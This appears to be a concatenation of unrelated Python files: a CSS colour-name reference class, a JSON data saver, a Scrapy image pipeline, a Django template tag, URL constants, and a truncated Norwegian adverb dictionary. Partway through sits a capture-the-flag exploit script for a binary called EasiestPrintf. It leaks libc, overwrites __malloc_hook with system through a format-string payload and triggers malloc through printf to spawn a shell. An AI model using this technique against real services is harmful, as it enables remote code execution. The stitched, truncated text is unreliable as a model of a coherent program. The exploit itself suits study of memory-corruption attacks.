(128, 0, 0), 128), 'white' : ('#FFFFFF', (255, 255, 255), 16777215), 'silver' : ('#C0C0C0', (192, 192, 192), 12632256), 'gray' : ('#808080', (128, 128, 128), 8421504), 'black' : ('#000000', (0, 0, 0), 0) } class RefCSS(object): """ CSS reference dicts & methods """ @classmethod def searchref_CSS(cls, typ='HEX', srch=''): """ Search in CSS color dict :param typ: returned type :param srch: item to search :return: item found returned as type passed in parameter """ try: for idx, (h, r, ms) in cls.ref_colCSS.items(): if h == srch.upper() or r == srch or ms == srch or idx == srch.lower(): if typ == 'HEX': return h elif typ == 'RGB': return r elif typ == 'MSCode': return ms else: # if typ == 'Name': return idx except KeyError: pass lfields_CSS = ['Name', 'HEX', 'RGB', 'MSCode'] ref_colCSS = { # CSS colors reference # Colour Name, Hex, R, G, B, Microsoft Access code nr 'lightpink' : ('#FFB6C1', (255, 182, 193), 12695295), 'pink' : ('#FFC0CB', (255, 192, 203), 13353215), 'crimson' : ('#DC143C', (220, 20, 60), 3937500), 'lavenderblush' : ('#FFF0F5', (255, 240, 245), 16118015), 'palevioletred' : ('#DB7093', (219, 112, 147), 9662683), 'hotpink' : ('#FF69B4', (255, 105, 180), 11823615), 'deeppink' : ('#FF1493', (255, 20, 147), 9639167), 'mediumvioletred' : ('#C71585', (199, 21, 133), 8721863), 'orchid' : ('#DA70D6', (218, 112, 214), 14053594), 'thistle' : ('#D8BFD8', (216, 191, 216), 14204888), 'plum' : ('#DDA0DD', (221, 160, 221), 14524637), 'violet' : ('#EE82EE', (238, 130, 238), 15631086), 'fuchsia' : ('#FF00FF', (255, 0, 255), 16711935), 'darkmagenta' : ('#8B008B', (139, 0, 139), 9109643), 'purple' : ('#800080', (128, 0, 128), 8388736), 'mediumorchid' : ('#BA55D3', (186, 85, 211), 13850042), 'darkviolet' : ('#9400D3', (148, 0, 211), 13828244), 'darkorchid' : ('#9932CC', (153, 50, 204), 13382297), 'indigo' : ('#4B0082', (75, 0, 130), 8519755), 'blueviolet' : ('#8A2BE2', (138, 43, 226), 14822282), 'mediumpurple' : ('#9370DB', (147, 112, 219), 14381203), 'mediumslateblue' : ('#7B68EE', 
(123, 104, 238), 15624315), 'slateblue' : ('#6A5ACD', (106, 90, 205), 13458026), 'darkslateblue' : ('#483D8B', (72, 61, 139), 9125192), 'ghostwhite' : ('#F8F8FF', (248, 248, 255), 16775416), 'lavender' : ('#E6E6FA', (230, 230, 250), 16443110), 'blue' : ('#0000FF', (0, 0, 255), 16711680), 'mediumblue' : ('#0000CD', (0, 0, 205), 13434880), 'darkblue' : ('#00008B', (0, 0, 139), 9109504), 'navy' : ('#000080', (0, 0, 128), 8388608), 'midnightblue' : ('#191970', (25, 25, 112), 7346457), 'royalblue' : ('#4169E1', (65, 105, 225), 14772545), 'cornflowerblue' : ('#6495ED', (100, 149, 237), 15570276), 'lightsteelblue' : ('#B0C4DE', (176, 196, 222), 14599344), 'lightslategray' : ('#778899', (119, 136, 153), 10061943), 'slategray' : ('#708090', (112, 128, 144), 9470064), 'dodgerblue' : ('#1E90FF', (30, 144, 255), 16748574), 'aliceblue' : ('#F0F8FF', (240, 248, 255), 16775408), 'steelblue' : ('#4682B4', (70, 130, 180), 11829830), 'lightskyblue' : ('#87CEFA', (135, 206, 250), 16436871), 'skyblue' : ('#87CEEB', (135, 206, 235), 15453831), 'deepskyblue' : ('#00BFFF', (0, 191, 255), 16760576), 'lightblue' : ('#ADD8E6', (173, 216, 230), 15128749), 'powderblue' : ('#B0E0E6', (176, 224, 230), 15130800), 'cadetblue' : ('#5F9EA0', (95, 158, 160), 10526303), 'darkturquoise' : ('#00CED1', (0, 206, 209), 13749760), 'azure' : ('#F0FFFF', (240, 255, 255), 16777200), 'lightcyan' : ('#E0FFFF', (224, 255, 255), 16777184), 'paleturquoise' : ('#AFEEEE', (175, 238, 238), 15658671), 'aqua' : ('#00FFFF', (0, 255, 255), 16776960), 'darkcyan' : ('#008B8B', (0, 139, 139), 9145088), 'teal' : ('#008080', (0, 128, 128), 8421376), 'darkslategray' : ('#2F4F4F', (47, 79, 79), 5197615), 'mediumturquoise' : ('#48D1CC', (72, 209, 204), 13422920), 'lightseagreen' : ('#20B2AA', (32, 178, 170), 11186720), 'turquoise' : ('#40E0D0', (64, 224, 208), 13688896), 'aquamarine' : ('#7FFFD4', (127, 255, 212), 13959039), 'mediumaquamarine' : ('#66CDAA', (102, 205, 170), 11193702), 'mediumspringgreen' : ('#00FA9A', (0, 250, 154), 10156544), 'mintcream' : ('#F5FFFA', (245, 255, 250), 16449525), 'springgreen' : ('#00FF7F', (0, 255, 127), 8388352), 'mediumseagreen' : ('#3CB371', (60, 179, 113), 7451452), 'seagreen' : ('#2E8B57', (46, 139, 87), 5737262), 'honeydew' : ('#F0FFF0', (240, 255, 240), 15794160), 'darkseagreen' : ('#8FBC8F', (143, 188, 143), 9419919), 'palegreen' : ('#98FB98', (152, 251, 152), 10025880), 'lightgreen' : ('#90EE90', (144, 238, 144), 9498256), 'limegreen' : ('#32CD32', (50, 205, 50), 3329330), 'lime' : ('#00FF00', (0, 255, 0), 65280), 'forestgreen' : ('#228B22', (34, 139, 34), 2263842), 'green' : ('#008000', (0, 128, 0), 32768), 'darkgreen' : ('#006400', (0, 100, 0), 25600), 'lawngreen' : ('#7CFC00', (124, 252, 0), 64636), 'chartreuse' : ('#7FFF00', (127, 255, 0), 65407), 'greenyellow' : ('#ADFF2F', (173, 255, 47), 3145645), 'darkolivegreen' : ('#556B2F', (85, 107, 47), 3107669), 'yellowgreen' : ('#9ACD32', (154, 205, 50), 3329434), 'olivedrab' : ('#6B8E23', (107, 142, 35), 2330219), 'ivory' : ('#FFFFF0', (255, 255, 240), 15794175), 'beige' : ('#F5F5DC', (245, 245, 220), 14480885), 'lightyellow' : ('#FFFFE0', (255, 255, 224), 14745599), 'lightgoldenrodyellow': ('#FAFAD2', (250, 250, 210), 13826810), 'yellow' : ('#FFFF00', (255, 255, 0), 65535), 'olive' : ('#808000', (128, 128, 0), 32896), 'darkkhaki' : ('#BDB76B', (189, 183, 107), 7059389), 'palegoldenrod' : ('#EEE8AA', (238, 232, 170), 11200750), 'lemonchiffon' : ('#FFFACD', (255, 250, 205), 13499135), 'khaki' : ('#F0E68C', (240, 230, 140), 9234160), 'gold' : ('#FFD700', (255, 
215, 0), 55295), 'cornsilk' : ('#FFF8DC', (255, 248, 220), 14481663), 'goldenrod' : ('#DAA520', (218, 165, 32), 2139610), 'darkgoldenrod' : ('#B8860B', (184, 134, 11), 755384), 'floralwhite' : ('#FFFAF0', (255, 250, 240), 15792895), 'oldlace' : ('#FDF5E6', (253, 245, 230), 15136253), 'wheat' : ('#F5DEB3', (245, 222, 179), 11788021), 'orange' : ('#FFA500', (255, 165, 0), 42495), 'moccasin' : ('#FFE4B5', (255, 228, 181), 11920639), 'papayawhip' : ('#FFEFD5', (255, 239, 213), 14020607), 'blanchedalmond' : ('#FFEBCD', (255, 235, 205), 13495295), 'navajowhite' : ('#FFDEAD', (255, 222, 173), 11394815), 'antiquewhite' : ('#FAEBD7', (250, 235, 215), 14150650), 'tan' : ('#D2B48C', (210, 180, 140), 9221330), 'burlywood' : ('#DEB887', (222, 184, 135), 8894686), 'darkorange' : ('#FF8C00', (255, 140, 0), 36095), 'bisque' : ('#FFE4C4', (255, 228, 196), 12903679), 'linen' : ('#FAF0E6', (250, 240, 230), 15134970), 'peru' : ('#CD853F', (205, 133, 63), 4163021), 'peachpuff' : ('#FFDAB9', (255, 218, 185), 12180223), 'sandybrown' : ('#F4A460', (244, 164, 96), 6333684), 'chocolate' : ('#D2691E', (210, 105, 30), 1993170), 'saddlebrown' : ('#8B4513', (139, 69, 19), 1262987), 'seashell' : ('#FFF5EE', (255, 245, 238), 15660543), 'sienna' : ('#A0522D', (160, 82, 45), 2970272), 'lightsalmon' : ('#FFA07A', (255, 160, 122), 8036607), 'coral' : ('#FF7F50', (255, 127, 80), 5275647), 'orangered' : ('#FF4500', (255, 69, 0), 17919), 'darksalmon' : ('#E9967A', (233, 150, 122), 8034025), 'tomato' : ('#FF6347', (255, 99, 71), 4678655), 'salmon' : ('#FA8072', (250, 128, 114), 7504122), 'mistyrose' : ('#FFE4E1', (255, 228, 225), 14804223), 'lightcoral' : ('#F08080', (240, 128, 128), 8421616), 'snow' : ('#FFFAFA', (255, 250, 250), 16448255), 'rosybrown' : ('#BC8F8F', (188, 143, 143), 9408444), 'indianred' : ('#CD5C5C', (205, 92, 92), 6053069), 'red' : ('#FF0000', (255, 0, 0), 255), 'brown' : ('#A52A2A', (165, 42, 42), 2763429), 'firebrick' : ('#B22222', (178, 34, 34), 2237106), 'darkred' : ('#8B0000', (139, 0, 0), 139), 'maroon' : ('#800000', (128, 0, 0), 128), 'white' : ('#FFFFFF', (255, 255, 255), 16777215), 'whitesmoke' : ('#F5F5F5', (245, 245, 245), 16119285), 'gainsboro' : ('#DCDCDC', (220, 220, 220), 14474460), 'lightgrey' : ('#D3D3D3', (211, 211, 211), 13882323), 'silver' : ('#C0C0C0', (192, 192, 192), 12632256), 'darkgray' : ('#A9A9A9', (169, 169, 169), 11119017), 'gray' : ('#808080', (128, 128, 128), 8421504), 'dimgray' : ('#696969', (105, 105, 105), 6908265), 'black' : ('#000000', (0, 0, 0), 0) } class ColHTMLrestricted(RefHTMLrestricted, cHEX): """ restricted HTML set of colors class Inherits from colHEX & RefHTMLrestricted """ # TODO: recreate method to get data in dict (from self) def __init__(self, name='black', *args, **kwargs): self.dfields_HTMLrestricted = dict(zip(range(len(self.lfields_HTMLrestricted)), self.lfields_HTMLrestricted)) # make dict from fields list self.refs_HTMLrestricted = lambda: [vars(self)[var] for var in self.lfields_HTMLrestricted] # make list from color space members self.getHEX_from_Name = lambda n: self.ref_colHTMLrestricted.get(n)[0] self.getRGB_from_Name = lambda n: self.ref_colHTMLrestricted.get(n)[1] self.getMSCode_from_Name = lambda n: self.ref_colHTMLrestricted.get(n)[2] tmp = self.searchref_HTMLrestricted('Name', name) if name is None: tmp = 'black' cHEX.__init__(self, self.get('HEX', tmp), *args, **kwargs) self.type = 'HTMLrestricted' # can be used instead of isinstance on an object def get(self, typ='HEX', srch='self'): """ get data from restricted HTML colors dict :param typ: 
row in dict (from lfields_HTMLrestricted) :param srch: to search in dict keys :return: either string ot tuple of the type passed as parameter """ if srch == 'self': srch = self.HEX if not isinstance(typ, str): pass elif typ == 'Name': return self.HEX else: try: srch = srch.lower() if srch in self.ref_colHTMLrestricted: tup = self.ref_colHTMLrestricted.get(srch) for idx, val in enumerate(self.lfields_HTMLrestricted): if val == typ: return tup[idx - 1] except KeyError: print("Key not found!!!") pass class ColCSS(RefCSS, cHEX): """ CSS HTML set of colors class Inherits from colHEX & RefCSS """ # TODO: recreate method to get data in dict (from self) def __init__(self, name='black', *args, **kwargs): self.dfields_CSS = dict(zip(range(len(self.lfields_CSS)), self.lfields_CSS)) # make dict from fields list self.refs_CSS = lambda: [vars(self)[var] for var in self.lfields_CSS] # make list from color space members self.getHEX_from_Name = lambda n: self.ref_colCSS.get(n)[0] self.getRGB_from_Name = lambda n: self.ref_colCSS.get(n)[1] self.getMSCode_from_Name = lambda n: self.ref_colCSS.get(n)[2] tmp = self.searchref_CSS('Name', name) if name is None: tmp = 'black' cHEX.__init__(self, self.get('HEX', tmp), *args, **kwargs) self.type = 'CSS' # can be used instead of isinstance on an object def get(self, typ='HEX', srch='self'): """ get data from CSS colors dict :param typ: row in dict (from lfields_CSS) :param srch: to search in dict keys :return: either string ot tuple of the type passed as parameter """ if srch == 'self': srch = self.HEX if not isinstance(typ, str): pass elif typ == 'Name': return self.HEX else: try: srch = srch.lower() if srch in self.ref_colCSS: tup = self.ref_colCSS.get(srch) for idx, val in enumerate(self.lfields_CSS): if val == typ: return tup[idx - 1] except KeyError: print("Key not found!!!") pass if __name__ == "__main__": # TODO: recreate method to get data in dict (from self) col_HTMr = ColHTMLrestricted('olive') print(col_HTMr.searchref_HTMLrestricted()) # TODO: what's the point if called without param? col_CSS = ColCSS('thistle') print(col_CSS.searchref_CSS()) # TODO: what's the point if called without param? test_cases = ['navy', 'aqua', 'teal', 'lime', 'green', 'yellow', 'olive', 'red', 'ghostwhite'] for i, strcol in enumerate(test_cases): print("CSS set:\t\t\t\tColor {} corresponds to: HTML {} / RGB R{} G{} B{} / Access Code {}".format( strcol, col_CSS.get('HEX', strcol), col_CSS.get('RGB', strcol)[0], col_CSS.get('RGB', strcol)[1], col_CSS.get('RGB', strcol)[2], col_CSS.get('MSCode', strcol) )) print("HTML restricted set:\ttColor '{}' is RGB {}".format(strcol, col_HTMr.get('RGB', strcol)))
import intprim.filter.align.dtw
URL = 'https://www.dgi.gov.lk/news/press-releases-sri-lanka/covid-19-documents' GITHUB_URL = 'https://raw.githubusercontent.com/nuuuwan/nopdf_data/main' GITHUB_TOOL_URL = 'https://github.com/nuuuwan/nopdf_data/blob/main'
print((int(input())+11)%24)
# r1
import json
import logging

from helpers.save.data_saver import DataSaver


logger = logging.getLogger('ddd_site_parse')


class DataSaverJSON(DataSaver):
    def __init__(self, params: {}):
        super().__init__(params)

        self.ext = 'json'
        self.newline = params.get('newline', '')

    def _save(self, data: [], data_fields: [], output_path: str, params: {}) -> None:
        with open(output_path, 'w', newline=self.newline, encoding=self.encoding) as output:
            self._check_data_fields(data, data_fields)

            output.write('[\n')

            for row in data:
                try:
                    output.write(f'{json.dumps(dict((key, value) for key, value in row.items() if key in data_fields), indent=1, ensure_ascii=False)},\n')
                except UnicodeEncodeError as e:
                    logger.debug(f'[E: {e}] Write row error, trying to fix encoding: [{row}]')
                    DataSaver.fix_row_encoding(row, self.encoding)
                    output.write(f'{json.dumps(dict((key, value) for key, value in row.items() if key in data_fields), indent=1, ensure_ascii=False)},\n')

            # remove the trailing comma and newline, otherwise the JSON array would be invalid
            output.seek(output.tell() - 2, 0)
            output.write('\n]')
# -*- coding: utf-8 -*-

# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import os
from scrapy.pipelines.images import ImagesPipeline
from urllib import request
from trafficsign import settings
import re


class TrafficsignPipeline(ImagesPipeline):
    def get_media_requests(self,item,info):
        # This method is called before the download requests are sent.
        # In fact, it is this method that issues the download requests itself.
        request_objs = super(TrafficsignPipeline,self).get_media_requests(item,info)
        for request_obj in request_objs:
            request_obj.item = item
        return request_objs

    def file_path(self, request, response=None, info=None):
        # path returned by super()
        path = super(TrafficsignPipeline,self).file_path(request,response,info)
        url = request.url
        category = request.item.get("category")
        names = request.item.get('names')
        urls = request.item.get('image_urls')
        u_index = int(re.search(r'\w{2}(\d+)\.jpg',url).group(1))-1
        # get the file name
        file_name = names[u_index]
        # remove unnecessary characters
        file_name = re.sub(r'[、\.,,!!]+',"",file_name)
        images_store = settings.IMAGES_STORE
        category_path = os.path.join(images_store,category)
        if not os.path.exists(category_path):
            os.mkdir(category_path)
        image_name = re.sub(r"full/[\d\w-]+",file_name,path)
        image_path = os.path.join(category_path,image_name)
        print(image_path)
        return image_path
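# A minimal sketch (not part of the original project) of the settings this
# pipeline relies on: ITEM_PIPELINES and IMAGES_STORE are standard Scrapy
# settings, while the dotted path 'trafficsign.pipelines.TrafficsignPipeline'
# is an assumption about the project layout. The spider's items are assumed to
# carry the 'category', 'names' and 'image_urls' fields used in file_path().

# trafficsign/settings.py (excerpt)
ITEM_PIPELINES = {
    'trafficsign.pipelines.TrafficsignPipeline': 300,
}
IMAGES_STORE = './images'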
from common.generic_template_tag import GenericTemplateTag
from ..utils import get_what_teams_called, make_tournament_link
from ..models import PollMap


class DisplayTournamentMenuNode(GenericTemplateTag):
    template = 'display_tournament_menu.html'

    def __init__(self, tourney, double_br=1, extra_admin=0):
        self.tourney = tourney
        self.double_br = double_br
        self.extra_admin = extra_admin

    def render(self, context):
        tourney = self.resolve(context, self.tourney)
        txt = get_what_teams_called(tourney)
        link = make_tournament_link(tourney)
        mapvote = PollMap.objects.filter(tourney=tourney, selected=True)

        render_context = {
            'txt': txt,
            'link': link,
            'mapvote': mapvote,
            'double_br': self.resolve(context, self.double_br),
            'extra_admin': self.resolve(context, self.extra_admin),
            'tourney': tourney
        }

        return self.render_to_string(
            render_context,
            context_instance=context
        )


from django.template import Library
register = Library()
register.tag('display_tournament_menu', DisplayTournamentMenuNode.invoke)
# File: exp.py
# Author: raycp
# Date: 2019-06-08
# Description: exp for EasiestPrintf, trigger malloc by printf

from pwn_debug import *

pdbg=pwn_debug("./EasiestPrintf")
pdbg.context.terminal=['tmux', 'splitw', '-h']
#pdbg.local()
pdbg.debug("2.27")
#pdbg.remote('127.0.0.1', 22)
#p=pdbg.run("local")
#p=pdbg.run("remote")
p=pdbg.run("debug")
membp=pdbg.membp
#print hex(membp.elf_base),hex(membp.libc_base)
elf=pdbg.elf
libc=pdbg.libc
#io_file=IO_FILE_plus()
#io_file.show()

def pwn():
    pdbg.bp(0x804881C)
    p.recvuntil("read:\n")
    p.sendline(str(elf.got['read']))
    read_addr=int(p.recvuntil("\n")[:-1],16)
    libc_base=read_addr-libc.symbols['read']
    malloc_hook=libc_base+libc.symbols['__malloc_hook']
    system_addr=libc_base+libc.symbols['system']
    log.info("leak libc base: %s"%(hex(libc_base)))

    bss_addr=0x804A520
    # write system to malloc_hook, write "/bin/sh\x00" to bss_addr, then trigger malloc through a huge printf width (code is shown at the bottom); malloc(bss_addr-0x20) gets the shell.
    write_dict={malloc_hook:system_addr,bss_addr:u32('/bin'),bss_addr+4:u32("/sh\x00")}
    #payload=fmtstr_payload(7,write_dict,write_size="short")
    payload=pdbg.fmtstr_payload(7,write_dict,"short")
    payload+="%%%dc"%(bss_addr-0x20)
    p.recvuntil("Good Bye")
    log.info("fmt payload len: %s"%(hex(len(payload))))
    print repr(payload)
    p.sendline(payload)
    p.interactive()

if __name__ == '__main__':
    pwn()

'''
// source code that triggers malloc from printf
// in function "printf_positional" which is located in /glibc-2.27/stdio-common/vfprintf.c
1971      /* Maybe the buffer is too small.  */
          if (MAX (prec, width) + EXTSIZ > WORK_BUFFER_SIZE)
            {
              if (__libc_use_alloca ((MAX (prec, width) + EXTSIZ)
                                     * sizeof (CHAR_T)))
                workend = ((CHAR_T *) alloca ((MAX (prec, width) + EXTSIZ)
                                              * sizeof (CHAR_T))
                           + (MAX (prec, width) + EXTSIZ));
              else
                {
                  workstart = (CHAR_T *) malloc ((MAX (prec, width) + EXTSIZ)
                                                 * sizeof (CHAR_T));
                  if (workstart == NULL)
                    {
                      done = -1;
                      goto all_done;
                    }
                  workend = workstart + (MAX (prec, width) + EXTSIZ);
                }
            }
'''
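# Why the padding width is bss_addr-0x20 (a worked check of the arithmetic, not
# part of the original exploit; it assumes EXTSIZ is 32 in this glibc build):
# printf_positional() requests (MAX (prec, width) + EXTSIZ) * sizeof (CHAR_T)
# bytes, and sizeof (CHAR_T) is 1 for the narrow printf, so the requested size
# is width + 0x20. With width = bss_addr - 0x20 the hooked malloc() is called
# with exactly bss_addr, and since __malloc_hook now points to system, the call
# is effectively system(bss_addr) == system("/bin/sh").
EXTSIZ = 0x20
assert (0x804A520 - 0x20) + EXTSIZ == 0x804A520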
# coding: utf8 """ All wordforms are extracted from Norsk Ordbank in Norwegian Bokmål 2005, updated 20180627 (CLARINO NB - Språkbanken), Nasjonalbiblioteket, Norway: https://www.nb.no/sprakbanken/show?serial=oai%3Anb.no%3Asbr-5&lang=en License: Creative_Commons-BY (CC-BY) (https://creativecommons.org/licenses/by/4.0/) """ from __future__ import unicode_literals ADVERBS_WORDFORMS = { 'à jour': ('à jour',), 'à la carte': ('à la carte',), 'à la grecque': ('à la grecque',), 'à la mode': ('à la mode',), 'òg': ('òg',), 'a cappella': ('a cappella',), 'a konto': ('a konto',), 'a posteriori': ('a posteriori',), 'a prima vista': ('a prima vista',), 'a priori': ('a priori',), 'a tempo': ('a tempo',), 'a verbo': ('a verbo',), 'a viso': ('a viso',), 'a vista': ('a vista',), 'ad absurdum': ('ad absurdum',), 'ad acta': ('ad acta',), 'ad hoc': ('ad hoc',), 'ad infinitum': ('ad infinitum',), 'ad notam': ('ad notam',), 'ad undas': ('ad undas',), 'adagio': ('adagio',), 'akkurat': ('akkurat',), 'aktenfor': ('aktenfor',), 'aktenfra': ('aktenfra',), 'akter': ('akter',), 'akterinn': ('akterinn',), 'akterover': ('akterover',), 'akterut': ('akterut',), 'al fresco': ('al fresco',), 'al secco': ('al secco',), 'aldeles': ('aldeles',), 'alders tid': ('alders tid',), 'aldri': ('aldri',), 'aleine': ('aleine',), 'alene': ('alene',), 'alias': ('alias',), 'allegretto': ('allegretto',), 'allegro': ('allegro',), 'aller': ('aller',), 'allerede': ('allerede',), 'allesteds': ('allesteds',), 'allestedsfra': ('allestedsfra',), 'allestedshen': ('allestedshen',), 'allikevel': ('allikevel',), 'alltid': ('alltid',), 'alltids': ('alltids',), 'alt': ('alt',), 'altfor': ('altfor',), 'altså': ('altså',), 'amok': ('amok',), 'an': ('an',), 'ana': ('ana',), 'andante': ('andante',), 'andantino': ('andantino',), 'andelsvis': ('andelsvis',), 'andfares': ('andfares',), 'andføttes': ('andføttes',), 'annensteds': ('annensteds',), 'annenstedsfra': ('annenstedsfra',), 'annenstedshen': ('annenstedshen',), 'annetsteds': ('annetsteds',), 'annetstedsfra': ('annetstedsfra',), 'annetstedsfra': ('annetstedsfra',), 'annetstedshen': ('annetstedshen',), 'anno': ('anno',), 'anslagsvis': ('anslagsvis',), 'anstendigvis': ('anstendigvis',), 'anstigende': ('anstigende',), 'antakeligvis': ('antakeligvis',), 'antydningsvis': ('antydningsvis',), 'apropos': ('apropos',), 'argende': ('argende',), 'at': ('at',), 'att': ('att',), 'attende': ('attende',), 'atter': ('atter',), 'attpåtil': ('attpåtil',), 'attåt': ('attåt',), 'au': ('au',), 'aust': ('aust',), 'austa': ('austa',), 'austafjells': ('austafjells',), 'av gårde': ('av gårde',), 'av sted': ('av sted',), 'avdelingsvis': ('avdelingsvis',), 'avdragsvis': ('avdragsvis',), 'avhendes': ('avhendes',), 'avhends': ('avhends',), 'avsatsvis': ('avsatsvis',), 'babord': ('babord',), 'bakfra': ('bakfra',), 'bakk': ('bakk',), 'baklengs': ('baklengs',), 'bakover': ('bakover',), 'bakut': ('bakut',), 'bare': ('bare',), 'bataljonsvis': ('bataljonsvis',), 'beint fram': ('beint fram',), 'bekende': ('bekende',), 'belgende': ('belgende',), 'bent fram': ('bent fram',), 'bent frem': ('bent frem',), 'betids': ('betids',), 'bi': ('bi',), 'bidevind': ('bidevind',), 'bis': ('bis',), 'bitevis': ('bitevis',), 'bitte': ('bitte',), 'bitterlig': ('bitterlig',), 'blanko': ('blanko',), 'blidelig': ('blidelig',), 'blikk': ('blikk',), 'blikkende': ('blikkende',), 'blottende': ('blottende',), 'bom': ('bom',), 'bommende': ('bommende',), 'bona fide': ('bona fide',), 'bort': ('bort',), 'borte': ('borte',), 'bortimot': ('bortimot',), 'brennfort': 
('brennfort',), 'bråtevis': ('bråtevis',), 'bums': ('bums',), 'buntevis': ('buntevis',), 'buntvis': ('buntvis',), 'bus': ('bus',), 'bygdimellom': ('bygdimellom',), 'cantabile': ('cantabile',), 'cf': ('cf',), 'cif': ('cif',), 'cirka': ('cirka',), 'comme il faut': ('comme il faut',), 'crescendo': ('crescendo',), 'da': ('da',), 'dagevis': ('dagevis',), 'dagstøtt': ('dagstøtt',), 'dakapo': ('dakapo',), 'dam': ('dam',), 'dammende': ('dammende',), 'dann': ('dann',), 'de facto': ('de facto',), 'de jure': ('de jure',), 'decrescendo': ('decrescendo',), 'delkredere': ('delkredere',), 'dels': ('dels',), 'delvis': ('delvis',), 'den gang': ('den gang',), 'der': ('der',), 'der borte': ('der borte',), 'der hen': ('der hen',), 'der inne': ('der inne',), 'der nede': ('der nede',), 'der oppe': ('der oppe',), 'der ute': ('der ute',), 'derav': ('derav',), 'deretter': ('deretter',), 'derfor': ('derfor',), 'derfra': ('derfra',), 'deri': ('deri',), 'deriblant': ('deriblant',), 'derifra': ('derifra',), 'derimot': ('derimot',), 'dermed': ('dermed',), 'dernest': ('dernest',), 'derom': ('derom',), 'derpå': ('derpå',), 'dertil': ('dertil',), 'derved': ('derved',), 'dess': ('dess',), 'dessuten': ('dessuten',), 'dessverre': ('dessverre',), 'desto': ('desto',), 'diminuendo': ('diminuendo',), 'dis': ('dis',), 'dit': ('dit',), 'dit hen': ('dit hen',), 'ditover': ('ditover',), 'ditto': ('ditto',), 'dog': ('dog',), 'dolce': ('dolce',), 'dorgende': ('dorgende',), 'dryppende': ('dryppende',), 'drøssevis': ('drøssevis',), 'dus': ('dus',), 'dusinvis': ('dusinvis',), 'dyende': ('dyende',), 'døgnvis': ('døgnvis',), 'dønn': ('dønn',), 'dørg': ('dørg',), 'dørgende': ('dørgende',), 'dørimellom': ('dørimellom',), 'ei': ('ei',), 'eiende': ('eiende',), 'einkom': ('einkom',), 'eitrende': ('eitrende',), 'eks': ('eks',), 'eksempelvis': ('eksempelvis',), 'eksklusiv': ('eksklusiv',), 'eksklusive': ('eksklusive',), 'ekspress': ('ekspress',), 'ekstempore': ('ekstempore',), 'ellers': ('ellers',), 'en': ('en',), 'en bloc': ('en bloc',), 'en detail': ('en detail',), 'en face': ('en face',), 'en gros': ('en gros',), 'en masse': ('en masse',), 'en passant': ('en passant',), 'en profil': ('en profil',), 'en suite': ('en suite',), 'enda': ('enda',), 'endatil': ('endatil',), 'ende': ('ende',), 'ende fram': ('ende fram',), 'ende frem': ('ende frem',), 'ender': ('ender',), 'endog': ('endog',), 'ene': ('ene',), 'engang': ('engang',), 'enkeltvis': ('enkeltvis',), 'enkom': ('enkom',), 'enn': ('enn',), 'ennå': ('ennå',), 'ensteds': ('ensteds',), 'eo ipso': ('eo ipso',), 'ergo': ('ergo',), 'et cetera': ('et cetera',), 'etappevis': ('etappevis',), 'etsteds': ('etsteds',), 'etterhånden': ('etterhånden',), 'etterpå': ('etterpå',), 'etterskottsvis': ('etterskottsvis',), 'etterskuddsvis': ('etterskuddsvis',), 'ex animo': ('ex animo',), 'ex auditorio': ('ex auditorio',), 'ex cathedra': ('ex cathedra',), 'ex officio': ('ex officio',), 'exit': ('exit',), 'f.o.r.': ('f.o.r.',), 'fas': ('fas',), 'fatt': ('fatt',), 'feil': ('feil',), 'femti-femti': ('femti-femti',), 'fifty-fifty': ('fifty-fifty',), 'flekkevis': ('flekkevis',), 'flokkevis': ('flokkevis',), 'fluks': ('fluks',), 'fluksens': ('fluksens',), 'flunkende': ('flunkende',), 'flust': ('flust',), 'fly': ('fly',), 'fløyten': ('fløyten',), 'fob': ('fob',), 'for': ('for',), 'for hånden': ('for hånden',), 'for lengst': ('for lengst',), 'for resten': ('for resten',), 'for så vidt': ('for så vidt',), 'for tida': ('for tida',), 'for tiden': ('for tiden',), 'for visst': ('for visst',), 'for øvrig': ('for øvrig',), 
'fordevind': ('fordevind',), 'fordum': ('fordum',), 'fore': ('fore',), 'forfra': ('forfra',), 'forhakkende': ('forhakkende',), 'forholdsvis': ('forholdsvis',), 'forhåpentlig': ('forhåpentlig',), 'forhåpentligvis': ('forhåpentligvis',), 'forlengs': ('forlengs',), 'formelig': ('formelig',), 'forover': ('forover',), 'forresten': ('forresten',), 'forsøksvis': ('forsøksvis',), 'fort': ('fort',), 'fortere': ('fort',), 'fortest': ('fort',), 'forte': ('forte',), 'fortfarende': ('fortfarende',), 'fortissimo': ('fortissimo',), 'fortrinnsvis': ('fortrinnsvis',), 'forut': ('forut',), 'fra borde': ('fra borde',), 'fram': ('fram',), 'framføre': ('framføre',), 'framleis': ('framleis',), 'framlengs': ('framlengs',), 'framme': ('framme',), 'framstupes': ('framstupes',), 'framstups': ('framstups',), 'franko': ('franko',), 'free on board': ('free on board',), 'free on rail': ('free on rail',), 'frem': ('frem',), 'fremad': ('fremad',), 'fremdeles': ('fremdeles',), 'fremlengs': ('fremlengs',), 'fremme': ('fremme',), 'fremstupes': ('fremstupes',), 'fremstups': ('fremstups',), 'furioso': ('furioso',), 'fylkesvis': ('fylkesvis',), 'følgelig': ('følgelig',), 'føre': ('føre',), 'først': ('først',), 'ganske': ('ganske',), 'gardimellom': ('gardimellom',), 'gatelangs': ('gatelangs',), 'gid': ('gid',), 'givetvis': ('givetvis',), 'gjerne': ('gjerne',), 'gladelig': ('gladelig',), 'glimtvis': ('glimtvis',), 'glissando': ('glissando',), 'glugg': ('glugg',), 'gorr': ('gorr',), 'gorrende': ('gorrende',), 'gradvis': ('gradvis',), 'grandioso': ('grandioso',), 'granngivelig': ('granngivelig',), 'grassat': ('grassat',), 'grave': ('grave',), 'gruppevis': ('gruppevis',), 'gudskjelov': ('gudskjelov',), 'gullende': ('gullende',), 'gørr': ('gørr',), 'gørrende': ('gørrende',), 'hakk': ('hakk',), 'hakkende': ('hakkende',), 'halvveges': ('halvveges',), 'halvvegs': ('halvvegs',), 'halvveis': ('halvveis',), 'haugevis': ('haugevis',), 'heden': ('heden',), 'heim': ('heim',), 'heim att': ('heim att',), 'heiman': ('heiman',), 'heime': ('heime',), 'heimefra': ('heimefra',), 'heimetter': ('heimetter',), 'heimom': ('heimom',), 'heimover': ('heimover',), 'heldigvis': ('heldigvis',), 'heller': ('heller',), 'helst': ('helst',), 'hen': ('hen',), 'henholdsvis': ('henholdsvis',), 'henne': ('henne',), 'her': ('her',), 'herav': ('herav',), 'heretter': ('heretter',), 'herfra': ('herfra',), 'heri': ('heri',), 'heriblant': ('heriblant',), 'herifra': ('herifra',), 'herigjennom': ('herigjennom',), 'herimot': ('herimot',), 'hermed': ('hermed',), 'herom': ('herom',), 'herover': ('herover',), 'herpå': ('herpå',), 